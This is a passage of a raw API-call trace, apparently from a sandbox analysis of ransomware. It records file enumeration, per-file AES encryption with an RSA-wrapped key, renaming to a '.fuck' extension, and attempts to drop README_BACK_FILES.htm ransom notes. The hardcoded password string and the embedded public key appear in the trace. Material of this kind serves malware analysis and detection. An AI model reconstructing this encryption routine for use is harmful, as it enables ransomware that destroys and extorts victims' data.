pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x28d9aa8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0239.779] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d9aa8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.779] CloseHandle (hObject=0xffffffff) returned 1 [0239.779] CloseHandle (hObject=0xffffffff) returned 1 [0239.779] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico"), bFailIfExists=0) returned 0 [0239.780] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico", dwFileAttributes=0x0) returned 0 [0239.780] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico.gsg")) returned 0 [0239.781] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico.fuck" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico.fuck")) returned 0 [0239.781] CryptDestroyHash (hHash=0x28bf218) returned 1 [0239.781] CryptDestroyKey (hKey=0x28bf018) returned 1 [0239.781] CryptReleaseContext (hProv=0x28d5998, dwFlags=0x0) returned 1 [0239.781] FindNextFileA (in: hFindFile=0x28bee58, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0239.781] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0239.781] GetLastError () returned 0x5 [0239.782] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml")) returned 0x20 [0239.782] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml", dwFileAttributes=0x80) returned 0 [0239.782] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.783] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.783] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.783] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28d5998) returned 1 [0239.786] CryptCreateHash (in: hProv=0x28d5998, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0239.786] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0239.786] CryptHashData (hHash=0x28bf218, pbData=0x2889998, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.786] CryptDeriveKey (in: hProv=0x28d5998, Algid=0x6610, hBaseData=0x28bf218, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28bf018) returned 1 [0239.786] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY------", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.786] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0239.786] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28d4c50) returned 1 [0239.786] CryptImportPublicKeyInfo (in: hCryptProv=0x28d4c50, dwCertEncodingType=0x1, pInfo=0x28c9258*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c9288*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c9290*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28be9d8) returned 1 [0239.786] CryptEncrypt (in: hKey=0x28be9d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0239.787] CryptEncrypt (in: hKey=0x28be9d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d4cd8*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28d4cd8*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0239.787] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d4cd8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.787] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0239.787] CryptEncrypt (in: hKey=0x28bf018, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0239.787] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.787] CloseHandle (hObject=0xffffffff) returned 1 [0239.787] CloseHandle (hObject=0xffffffff) returned 1 [0239.787] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml"), bFailIfExists=0) returned 0 [0239.787] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml", dwFileAttributes=0x0) returned 0 [0239.788] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml.gsg")) returned 0 [0239.788] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml.fuck")) returned 0 [0239.789] CryptDestroyHash (hHash=0x28bf218) returned 1 [0239.789] CryptDestroyKey (hKey=0x28bf018) returned 1 [0239.789] CryptReleaseContext (hProv=0x28d5998, dwFlags=0x0) returned 1 [0239.789] FindNextFileA (in: hFindFile=0x28bee58, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0239.789] FindClose (in: hFindFile=0x28bee58 | out: hFindFile=0x28bee58) returned 1 [0239.789] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\readme_back_files.htm")) returned 0xffffffff [0239.789] AreFileApisANSI () returned 1 [0239.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2d78, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 109 [0239.789] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.790] GetLastError () returned 0x5 [0239.790] GetLastError () returned 0x5 [0239.790] FindNextFileA (in: hFindFile=0x28bec98, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0239.790] FindClose (in: hFindFile=0x28bec98 | out: hFindFile=0x28bec98) returned 1 [0239.790] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\readme_back_files.htm")) returned 0xffffffff [0239.790] AreFileApisANSI () returned 1 [0239.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6f80, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0239.791] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Task\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.791] GetLastError () returned 0x5 [0239.791] GetLastError () returned 0x5 [0239.791] FindNextFileA (in: hFindFile=0x28bee18, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0239.791] FindClose (in: hFindFile=0x28bee18 | out: hFindFile=0x28bee18) returned 1 [0239.791] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\device stage\\readme_back_files.htm")) returned 0xffffffff [0239.791] AreFileApisANSI () returned 1 [0239.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6d18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0239.792] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\device stage\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.793] GetLastError () returned 0x5 [0239.793] GetLastError () returned 0x5 [0239.793] FindNextFileA (in: hFindFile=0x282df78, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0239.793] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\DeviceSync\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x28bec98 [0239.793] FindNextFileA (in: hFindFile=0x28bec98, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0239.793] FindNextFileA (in: hFindFile=0x28bec98, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0239.793] FindNextFileA (in: hFindFile=0x28bec98, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0239.793] FindClose (in: hFindFile=0x28bec98 | out: hFindFile=0x28bec98) returned 1 [0239.793] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\DeviceSync\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\devicesync\\readme_back_files.htm")) returned 0x20 [0239.794] FindNextFileA (in: hFindFile=0x282df78, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0239.794] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Diagnosis\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0xffffffff [0239.794] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Diagnosis\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\readme_back_files.htm")) returned 0xffffffff [0239.795] AreFileApisANSI () returned 1 [0239.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd2b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0239.795] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Diagnosis\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.801] GetLastError () returned 0x5 [0239.801] GetLastError () returned 0x5 [0239.801] FindNextFileA (in: hFindFile=0x282df78, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0239.801] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\DRM\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x28bee18 [0239.801] FindNextFileA (in: hFindFile=0x28bee18, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0239.801] FindNextFileA (in: hFindFile=0x28bee18, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0239.801] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\DRM\\Server\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28bec98 [0239.802] FindNextFileA (in: hFindFile=0x28bec98, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.802] FindNextFileA (in: hFindFile=0x28bec98, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0239.802] FindClose (in: hFindFile=0x28bec98 | out: hFindFile=0x28bec98) returned 1 [0239.802] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\DRM\\Server\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\drm\\server\\readme_back_files.htm")) returned 0xffffffff [0239.802] AreFileApisANSI () returned 1 [0239.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd7c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0239.802] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\DRM\\Server\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\drm\\server\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.803] GetLastError () returned 0x5 [0239.803] GetLastError () returned 0x5 [0239.803] FindNextFileA (in: hFindFile=0x28bee18, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0239.803] FindClose (in: hFindFile=0x28bee18 | out: hFindFile=0x28bee18) returned 1 [0239.803] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\DRM\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\drm\\readme_back_files.htm")) returned 0xffffffff [0239.803] AreFileApisANSI () returned 1 [0239.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd1d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0239.803] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\DRM\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\drm\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.804] GetLastError () returned 0x5 [0239.804] GetLastError () returned 0x5 [0239.804] FindNextFileA (in: hFindFile=0x282df78, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0239.804] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Event Viewer\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x28bf018 [0239.804] FindNextFileA (in: hFindFile=0x28bf018, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0239.804] FindNextFileA (in: hFindFile=0x28bf018, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0239.804] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28bf1d8 [0239.805] FindNextFileA (in: hFindFile=0x28bf1d8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.805] FindNextFileA (in: hFindFile=0x28bf1d8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.805] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x28bf218 [0239.805] FindNextFileA (in: hFindFile=0x28bf218, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0239.805] FindNextFileA (in: hFindFile=0x28bf218, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0239.805] FindClose (in: hFindFile=0x28bf218 | out: hFindFile=0x28bf218) returned 1 [0239.806] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\event viewer\\views\\applicationviewsrootnode\\readme_back_files.htm")) returned 0xffffffff [0239.806] AreFileApisANSI () returned 1 [0239.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28894e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0239.806] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\event viewer\\views\\applicationviewsrootnode\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.806] GetLastError () returned 0x5 [0239.806] GetLastError () returned 0x5 [0239.806] FindNextFileA (in: hFindFile=0x28bf1d8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0239.806] FindClose (in: hFindFile=0x28bf1d8 | out: hFindFile=0x28bf1d8) returned 1 [0239.807] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\event viewer\\views\\readme_back_files.htm")) returned 0xffffffff [0239.807] AreFileApisANSI () returned 1 [0239.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6d18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0239.807] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Event Viewer\\Views\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\event viewer\\views\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.807] GetLastError () returned 0x5 [0239.807] GetLastError () returned 0x5 [0239.807] FindNextFileA (in: hFindFile=0x28bf018, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0239.808] FindClose (in: hFindFile=0x28bf018 | out: hFindFile=0x28bf018) returned 1 [0239.808] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Event Viewer\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\event viewer\\readme_back_files.htm")) returned 0xffffffff [0239.808] AreFileApisANSI () returned 1 [0239.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f69a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0239.808] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Event Viewer\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\event viewer\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.809] GetLastError () returned 0x5 [0239.809] GetLastError () returned 0x5 [0239.809] FindNextFileA (in: hFindFile=0x282df78, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0239.809] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\IdentityCRL\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x28bf018 [0239.809] FindNextFileA (in: hFindFile=0x28bf018, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0239.809] FindNextFileA (in: hFindFile=0x28bf018, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0239.809] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\IdentityCRL\\INT\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28bf1d8 [0239.809] FindNextFileA (in: hFindFile=0x28bf1d8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.809] FindNextFileA (in: hFindFile=0x28bf1d8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.809] FindNextFileA (in: hFindFile=0x28bf1d8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0239.809] FindClose (in: hFindFile=0x28bf1d8 | out: hFindFile=0x28bf1d8) returned 1 [0239.810] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\IdentityCRL\\INT\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\int\\readme_back_files.htm")) returned 0xffffffff [0239.810] AreFileApisANSI () returned 1 [0239.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6c68, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0239.810] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\IdentityCRL\\INT\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\int\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.810] GetLastError () returned 0x5 [0239.810] GetLastError () returned 0x5 [0239.810] FindNextFileA (in: hFindFile=0x28bf018, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0239.810] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28bee18 [0239.811] FindNextFileA (in: hFindFile=0x28bee18, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.811] FindNextFileA (in: hFindFile=0x28bee18, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.811] FindNextFileA (in: hFindFile=0x28bee18, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.811] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\temp\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x28bf1d8 [0239.811] FindNextFileA (in: hFindFile=0x28bf1d8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0239.811] FindNextFileA (in: hFindFile=0x28bf1d8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0239.811] FindClose (in: hFindFile=0x28bf1d8 | 